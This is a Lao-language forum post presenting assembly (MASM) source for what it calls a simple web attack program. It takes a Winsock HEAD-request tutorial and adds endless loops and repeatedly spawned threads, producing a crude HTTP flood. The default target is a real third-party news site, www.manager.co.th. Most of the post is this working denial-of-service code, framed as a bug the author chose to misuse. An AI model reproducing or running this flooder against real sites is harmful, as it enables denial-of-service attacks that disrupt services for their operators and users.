SOUKPHATHAI


SOUKPHATHAI
 
บ้าน[MASM] ຂຽນໂປຣແກຣມໂຈມຕີ Web ແບບງ່າຍໆ Fo10ค้นหาสมัครสมาชิก(Register)เข้าสู่ระบบ(Log in)
Welcome to our forums!->BE ACTIVE AND RESPECT OTHERS!

Share
 

 [MASM] ຂຽນໂປຣແກຣມໂຈມຕີ Web ແບບງ່າຍໆ

Go down 
ผู้ตั้งข้อความ
SOUKPHATHAI
Admin
SOUKPHATHAI

Posts : 160
ເງີນ : 12203
ຄວາມດີ : 0
Join date : 22/03/2010
Age : 28

Character sheet
RAY:

[MASM] ຂຽນໂປຣແກຣມໂຈມຕີ Web ແບບງ່າຍໆ Empty
ตั้งหัวข้อเรื่อง: [MASM] ຂຽນໂປຣແກຣມໂຈມຕີ Web ແບບງ່າຍໆ   [MASM] ຂຽນໂປຣແກຣມໂຈມຕີ Web ແບບງ່າຍໆ EmptyTue Mar 30, 2010 11:27 am

ຄວາມຈິງເພິ່ນບໍ່ໄດ້ຕັ້ງໃຈຂຽນໃຫ້ມັນຍິງເວັບ, ເຫດເກີດຈາກຄວາມຜິດພາດຂອງການວົນ Loop ແລະ Thread ໃນການຂຽນ Code ເພິ່ນກະເລຍເອົາມາທົດລອງໃຊ້ໃນທາງທີ່ຜິດ ແກ້ເຊັງວ່າຊັ້ນ Wink

ໃນຮູບ ທົດສອບກັບເຄື່ອງໂຕເອງ ແລະ ໃຊ້ Delphi ຂຽນເປັນ server ຈຳລອງຂຶ້ນມາໃຫ້ສະແດງ log ທີ່ຍິງໄປ



[MASM] ຂຽນໂປຣແກຣມໂຈມຕີ Web ແບບງ່າຍໆ I3810_attack


ເບິ່ງ Code ເຕັມໆໄດ້ທີ່
http://www.madwizard.org/programming/tutorials/netasm/


ອັນນີ້ແມ່ນ Code ທີ່ເພີ່ມ Loop ແລະ Thread ໂຕທີ່ເປັນບັນຫາ



; Head request example
; View with tabsize = 4
; Part of the Winsock networking tutorial by Thomas Bleeker
; Visit www.MadWizard.org
;
.586
.model flat, stdcall
option casemap:none
include <windows.inc>
include <kernel32.inc>
include <user32.inc>
include <crtlib.inc>
include <ws2_32.inc> ; the winsock 2 include
includelib <kernel32.lib>
includelib <user32.lib>
includelib <crtlib.lib>
includelib <ws2_32.lib> ; the winsock 2 library
RequestHeaders proto stdcall :dword
FindHostIP proto stdcall :dword
main proto stdcall :dword, :dword
FillSockAddr proto stdcall :dword, :dword, :dword
.data
CR equ 0Dh
LF equ 0Ah
g_defaultServerName db "www.manager.co.th",0
SERVER_PORT equ 80
TEMP_BUFFER_SIZE equ 128
REQ_WINSOCK_VER equ 2
g_request_part1 db "HEAD / HTTP/1.1",CR,LF ; Get root index from server
db "Host: " ; Specify host name used
REQUEST_SIZE1 equ $ - g_request_part1 ; size of request part1 in bytes
g_request_part2 db CR,LF ; End hostname header from part1
db "User-agent: HeadReqSample",CR,LF ; Specify user agent
db "Connection: close",CR,LF ; Close connection after response
db CR,LF ; Empty line indicating the end of the request
REQUEST_SIZE2 equ $ - g_request_part2 ; size of request part2 in bytes
g_msgLookupHost db "Looking up hostname %s... ",0
g_msgFound db "found.",CR,LF,0
g_msgCreateSock db "Creating socket... ",0
g_msgCreated db "created.",CR,LF,0
g_msgConnect db "Attempting to connect to %s:%d... ",0
g_msgConnected db "connected.",CR,LF,0
g_msgSendReq db "Sending request... ",0
g_msgReqSent db "request sent.",CR,LF,0
g_msgDumpData db "Dumping received data...",CR,LF,CR,LF,0
g_msgInitWinsock db "Initializing winsock... ",0
g_msgInitialized db "initialized.",CR,LF,0
g_msgDone db "done.",CR,LF,0
g_msgCleanup db "Cleaning up winsock... ",0
g_errHostName db "could not resolve hostname.",CR,LF,0
g_errCreateSock db "could not create socket.",CR,LF,0
g_errConnect db "could not connect.",CR,LF,0
g_errSend db "failed to send data.",CR,LF,0
g_errRead db "socket error while receiving.",CR,LF,0
g_errStartup db "startup failed!",0
g_errVersion db "required version not supported!",0
g_errCleanup db "cleanup failed!",CR,LF,0
.data
Attack DWORD ?
DoSend DWORD ?
lpThreadId DWORD ?
.code
;-------------------------------------------------------------------------------
; <FindHostIP>
;-------------------------------------------------------------------------------
; Parameters
; pServerName pointer to a string containing the server
; name to resolve the IP number for.
; Return value
; IP number in network byte order or NULL if the hostname
; was not found.
FindHostIP proc uses ebx pServerName:dword
invoke gethostbyname, [pServerName]
test eax, eax
jz _return
; eax is a pointer to a HOSTENT structure now,
; get first address list pointer in list:
mov eax, [(hostent ptr [eax]).h_list]
test eax, eax
jz _return
; get first address pointer in list:
mov eax, [eax]
test eax, eax
jz _return
; get first address from pointer
mov eax, [eax]
; eax is IP number now, fall through so IP gets returned
_return:
ret
FindHostIP endp
;-------------------------------------------------------------------------------
; <FillSockAddr>
;-------------------------------------------------------------------------------
; Parameters
; pSockAddr pointer to the sockaddr_in structure to fill
; pServerName pointer to a string containing the server
; name to address
; portNumber address port number
; Return value
; 0: host lookup failed
; not 0: function succeeded
FillSockAddr proc pSockAddr:dword, pServerName:dword, portNumber:dword
invoke FindHostIP, [pServerName]
test eax, eax
jz _done
mov edx, [pSockAddr]
mov ecx, [portNumber]
xchg cl, ch ; convert to network byte order
mov [edx][sockaddr_in.sin_family], AF_INET
mov [edx][sockaddr_in.sin_port], cx
mov [edx][sockaddr_in.sin_addr.S_un.S_addr], eax
_done:
ret
FillSockAddr endp
;-------------------------------------------------------------------------------
; <main>
;-------------------------------------------------------------------------------
main proc uses ebx argc:dword, argv:dword
local wsaData:WSADATA
invoke printf, addr g_msgInitWinsock
invoke WSAStartup, REQ_WINSOCK_VER, addr wsaData
mov ecx, offset g_errStartup
test eax, eax
jnz _error
; Check if major version (low byte) is at least REQ_WINSOCK_VER
cmp byte ptr [wsaData.wVersion], REQ_WINSOCK_VER
mov ecx, offset g_errVersion
jb _error_cleanup
invoke printf, addr g_msgInitialized
; Check if hostname is given as the program's parameter,
; otherwise use the default hostname.
mov ecx, offset g_defaultServerName
cmp [argc], 2 ; at least 1 argument?
mov eax, [argv] ; get argument vector
jb @F
mov ecx, [eax][1*4] ; get first argument
@@:
invoke RequestHeaders, ecx
mov ebx, eax
xor ebx, 1
; ebx now is 0 on success, 1 on failure of RequestHeaders
_cleanup:
invoke printf, addr g_msgCleanup
invoke WSACleanup
test eax, eax
jz _done
invoke printf, addr g_errCleanup
_done:
invoke printf, addr g_msgDone
mov eax, ebx ; return code in ebx
ret
_error_cleanup:
mov ebx, _cleanup
jmp _printError
_error:
mov ebx, _done
_printError:
invoke printf, ecx
mov eax, ebx
mov ebx, 1 ; return 1 (error)
jmp eax
main endp
;-------------------------------------------------------------------------------
; <RequestHeaders>
;-------------------------------------------------------------------------------
; Parameters
; pHostname pointer to a string containing the server
; name to perform a HTTP request on.
; Return value
; 0: failed
; 1: succeeded
RequestHeaders proc uses ebx esi pServername:dword
local tempBuffer[TEMP_BUFFER_SIZE]:byte,
sockAddr:sockaddr_in
; hSocket:dword = esi
; initialize socket value to prevent cleaning up
; on error with socket creation.
mov esi, INVALID_SOCKET
; Lookup hostname:
mov ebx, [pServername]
invoke printf, addr g_msgLookupHost, ebx
; Find server and fill sockAddr structure with its
; information
invoke FillSockAddr, addr sockAddr, ebx, SERVER_PORT
mov ecx, offset g_errHostName
test eax, eax
jz _error
invoke printf, addr g_msgFound
; Create socket:
invoke printf, addr g_msgCreateSock
invoke socket, AF_INET, SOCK_STREAM, IPPROTO_TCP
mov ecx, offset g_errCreateSock
cmp eax, INVALID_SOCKET
je _error
mov esi, eax
invoke printf, addr g_msgCreated
; Convert IP to ascii string and print connect message:
invoke inet_ntoa, [sockAddr.sin_addr.S_un.S_addr]
invoke printf, addr g_msgConnect, eax, SERVER_PORT
; Attempt to connect:
invoke connect, esi, addr sockAddr, sizeof sockAddr
mov ecx, offset g_errConnect
test eax, eax
jnz _error
invoke printf, addr g_msgConnected
invoke printf, addr g_msgSendReq
; send request part 1
invoke send, esi, addr g_request_part1, REQUEST_SIZE1, 0
mov ecx, offset g_errSend
cmp eax, SOCKET_ERROR
je _error
; send hostname
invoke lstrlen, [pServername]
invoke send, esi, [pServername], eax, 0
mov ecx, offset g_errSend
cmp eax, SOCKET_ERROR
je _error
; send request part 2
invoke send, esi, addr g_request_part2, REQUEST_SIZE2, 0
mov ecx, offset g_errSend
cmp eax, SOCKET_ERROR
je _error
; all sends succeeded
invoke printf, addr g_msgReqSent
; Receive data in a loop until the connection is closed by
; the server.
invoke printf, addr g_msgDumpData
_recvLoop:
invoke recv, esi, addr tempBuffer, TEMP_BUFFER_SIZE-1, 0
test eax, eax
mov ecx, offset g_errRead
jz _connectionClosed ; return value 0 means connection closed
cmp eax, SOCKET_ERROR
je _error
; eax is number of bytes received, add a null
; terminator and print the buffer:
mov [tempBuffer][eax], 0
invoke printf, addr tempBuffer
jmp _recvLoop
_connectionClosed:
mov ebx, 1 ; return code (1 = no error)
_cleanup:
; close socket if it was created:
cmp esi, INVALID_SOCKET
je @F
invoke closesocket, esi
@@:
mov eax, ebx
ret
_error:
invoke printf, ecx
xor ebx, ebx ; return code (0 = error)
jmp _cleanup
RequestHeaders endp
Web Proc
mov Attack, FALSE
.repeat
sub esp, 12
lea eax, [esp+0] ; &env
lea ecx, [esp+4] ; &argc
lea edx, [esp+8] ; &argv
invoke getmainargs, ecx, edx, eax, 0
add esp, 4 ; remove env (not used)
call main
invoke Sleep,3000
.until Attack == TRUE
Ret
Web EndP
ProcsThread proc lpParam: DWORD
@@:
invoke Web
invoke Sleep, 1000
jmp @B
xor eax, eax
ret
ProcsThread endp
StartProcessThread proc
invoke CreateThread, NULL, 0, offset ProcsThread, 0, 0, addr lpThreadId
ret
StartProcessThread endp
start:
mov DoSend, TRUE
@@:
.IF DoSend
invoke StartProcessThread
mov DoSend, FALSE
.ELSE
mov DoSend, TRUE
.ENDIF
invoke Sleep, 2000
jmp @b
invoke ExitProcess, eax
end start
ขึ้นไปข้างบน Go down
http://soukphathai.forumlo.com
 
[MASM] ຂຽນໂປຣແກຣມໂຈມຕີ Web ແບບງ່າຍໆ
ขึ้นไปข้างบน 
หน้า 1 จาก 1

Permissions in this forum:คุณไม่สามารถพิมพ์ตอบ
SOUKPHATHAI :: DEVELOPER ZONE :: Assembly-
ไปที่: